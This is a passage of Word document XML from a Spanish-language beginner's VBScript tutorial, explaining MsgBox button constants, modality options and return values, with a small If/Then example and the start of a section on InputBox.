                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>tercer botón</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> es el predeterminado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="307"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="13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DefaultButton4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="8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768</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="83"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El </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>cuarto botón</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> es el predeterminado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="370"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="29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Alternativo*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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Valor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="57" w:firstLine="0"/>
              <w:jc w:val="center"/>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Función que realiza</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="853"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>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ApplicationModal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="78"/>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Cuadro de </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>diálogo modal de la aplicación</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>. El usuario debe responder al cuadro de diálogo antes de continuar trabajando en la aplicación actual.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="838"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="226"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SystemModal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5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4096</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="22" w:firstLine="154"/>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Cuadro de </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>diálogo modal del sistema</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>. Se suspenden todas las aplicaciones hasta que el usuario responda al cuadro de mensaje.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="307"/>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Alternativo significa que en vez de poner un numero también puedes colocar ese nombre uniéndolos con el signo de suma (+). Ej: vbOKOnly+vbCritical sería lo mismo que 0+16 o bien 16 (la suma echa).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>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ta forma, si yo por ejemplo quiero un mensaje con los botones </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sí</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 xml:space="preserve">No, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>icono de información</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y que el botón </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sea el predeterminado tendré que sumar 4, 64 y 256: 4+64+256= 324 Y de esa forma sustituiré el 0 por 324:</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Variable = MsgBox("Mensaje",324,"Titulo")</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Lo cual nos mostrará el interesante siguiente cuadro de Mensaje:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2758"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2019300" cy="1267460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2913" name="Picture 2913"/>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a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2019300" cy="1267460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="336"/>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Ahora que tenemos en juego varios botones, nos interesa saber cual pulsa el usuario. Así que, por último, la Variable asignada a la función tomara unos valores dependiendo del botón que se pulse cuando salga el mensaje, según la siguiente tabla:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2678"/>
          <w:tab w:val="center" w:pos="6023"/>
        </w:tabs>
        <w:spacing w:after="3" w:line="265"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Calibri"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Comic Sans MS"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Valor que recibe la Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Comic Sans MS"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t>Botón pulsado</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Aceptar</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Cancelar</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Anular</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Reintentar</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Ignorar</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Sí</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="278"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No</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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combinado con la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">sentencia </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>If</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u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>explicada anteriormente</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y otros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 puede dar como resultado una respuesta inteligente, bastante interesante, como por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="36" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5104"/>
        <w:gridCol w:w="3597"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="2691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5104" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="14" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="14" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238"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Estas aprendiendo algo?",324,"VBScript")</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 = 6 Then</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Me alegro!",0,"VBScript")</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lse</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238"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3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Tan malo soy explicando?",0,"VBScript")</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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3597" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="14" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="5" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>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parece un mensaje con los botones Si y No…</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="575"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i pulsamos el botón si... ...sale un MsgBox con el botón Aceptar.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="303"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i no pulsamos el botón si... ...sale un MsgBox con el botón Aceptar.</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in de la condición.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4"/>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Obviamente, los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 están en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>misma línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no partidos), pero aquí por causa del tamaño del papel salen partidos. Esto dará como resultado la siguiente imagen. Cos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con un poco de imaginación, nos abre las fronteras de lo que podemos hacer a estas alturas (¡y con lo poco que sabemos!):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="582"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4781550" cy="2686050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3022" name="Picture 3022"/>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18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4781550" cy="2686050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="106"/>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Sin duda la cosa ahora a mejorado bastante, e insisto de nuevo en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>repasar todo lo visto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, o bien ahora, o bien al final de ver el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>InputBox</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, también llamado </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cuadro de Dialogo</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La función InputBox crea una ventana de la siguiente forma, lo cual, si lo pensáis bien, abre más aun nuestros horizontes, aunque realmente sea una ventana un poco fea:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1610"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3475990" cy="1475740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3054" name="Picture 3054"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="3054" name="Picture 3054"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3475990" cy="1475740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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l cuadro de dialogo o InputBox puedes </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>editar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>mensaje</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">titulo, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>respuesta predeterminada</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>posición en la pantalla</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
